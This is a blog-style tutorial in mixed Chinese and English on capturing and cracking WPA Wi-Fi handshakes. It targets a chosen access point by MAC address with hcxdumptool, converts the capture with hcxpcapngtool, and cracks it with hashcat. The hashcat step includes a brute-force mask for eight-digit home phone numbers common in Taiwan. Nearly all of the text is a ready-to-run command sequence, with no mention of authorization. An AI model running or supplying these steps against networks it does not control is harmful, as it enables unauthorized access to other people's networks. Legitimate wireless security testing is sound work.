Preparation

  • Kali Linux operating system
  • A Wifi dongle that supports monitor mode and packet injection, I’m using Alfa AWUS036ACM works out of the box without any driver.
  • Running unsupported dongle (like TP-Link Archer Tx35U) might end up with a crashing kernel

Attack

跟上集老方法不太一樣,這次要用hcxdumptool來抓取packet, instead of using airodump-ng

Kali Linux應該是預設安裝好了,若沒有的話可以sudo apt update && sudo apt install hcxtools,或是compile from source

1. Turn off services

1
2
sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant

這兩個是有可能會影響到等等攻擊的service,wpa_supplicant是無線網路後端的component

2. Generate bpf file

bpf file是hcxdumptool用來過濾packet的檔案,在檔案中存在的mac address可以被設定成要攻擊還是無視

可以先用airodump-ng來抓到要攻擊的對象mac address和channel number

1
hcxdumptool --bpfc="wlan addr1 <mac_addr> or wlan addr2 <mac_addr> or wlan addr3 <mac_addr>" >> attack.bpf

若是要保護某mac_addr:

1
hcxdumptool --bpfc="not wlan addr3 <mac_addr>" >> protect.bpf

這次我們要指定攻擊某個對象,所以用attack.bpf

3. Run hcxdumptool

1
sudo hcxdumptool -i wlan0 -c 11a --bpf=attack.bpf -w <output_name>.pcapng --rds=3`
  • -i: specifies the interface name
  • -w: output file name
  • -c: channel number, follow by one character:
1
2
3
4
5
band a: NL80211_BAND_2GHZ
band b: NL80211_BAND_5GHZ
band c: NL80211_BAND_6GHZ
band d: NL80211_BAND_60GHZ
band e: NL80211_BAND_S1GHZ (902 MHz
  • --rds: how much information to display, check hcxdumptool -h for more (不要看man page,不是最新的)

大概會看到這些:

1
2
3
CHA|  LAST  |EA123P|   MAC-CL   |   MAC-AP   |ESSID          (SCAN:  2437/6)
---+--------+------+------------+------------+--------------------------------
  6|01:57:05|ep    |xxxxxxxxxxxx|xxxxxxxxxxxx|xxx

當看到EA123P的2, 3, P下面有+的時候,就可以停了,若不確定,可以跑久一點來make sure all EAPOL frame/PMKID frame都有抓到

4. Convert file to hashcat format

1
hcxpcapngtool -o filename.hc22000 filename.pcapng

hcxpcapngtool will throw errors if:

  1. The capture was too short/incomplete.
  2. The format used is old/outdated.
  3. Too many DEAUTHENTICATION frames were detected.
  4. The capture file was cleaned.
  5. No PROBEREQUESTS were detected.
  6. Too few M1 frames were detected.

有警告可能還是解的出來,但如果說impossible那就是沒有辦法

5. Crack

跟上集是一樣的,用自己喜歡的wordlist

1
hashcat -m 22000 filename.hc22000 wordlist.txt

也可以用bruteforce(暴力解)模式,例如台灣很常見的家裡電話八碼可以這樣:

1
hashcat -m 22000 filename.hc22000 -a 3 \?d\?d\?d\?d\?d\?d\?d\?d

(我的terminal打\?d才會認成command line args,正常來說打?d就可以了)

  • -a: mode, 3 means bruteforce
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Built-in charsets
       ?l = abcdefghijklmnopqrstuvwxyz
       ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
       ?d = 0123456789
       ?h = 0123456789abcdef
       ?H = 0123456789ABCDEF
       ?s =  !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
       ?a = ?l?u?d?s
       ?b = 0x00 - 0xff

Attack mode
       0 = Straight
       1 = Combination
       3 = Brute-force
       6 = Hybrid Wordlist + Mask
       7 = Hybrid Mask + Wordlis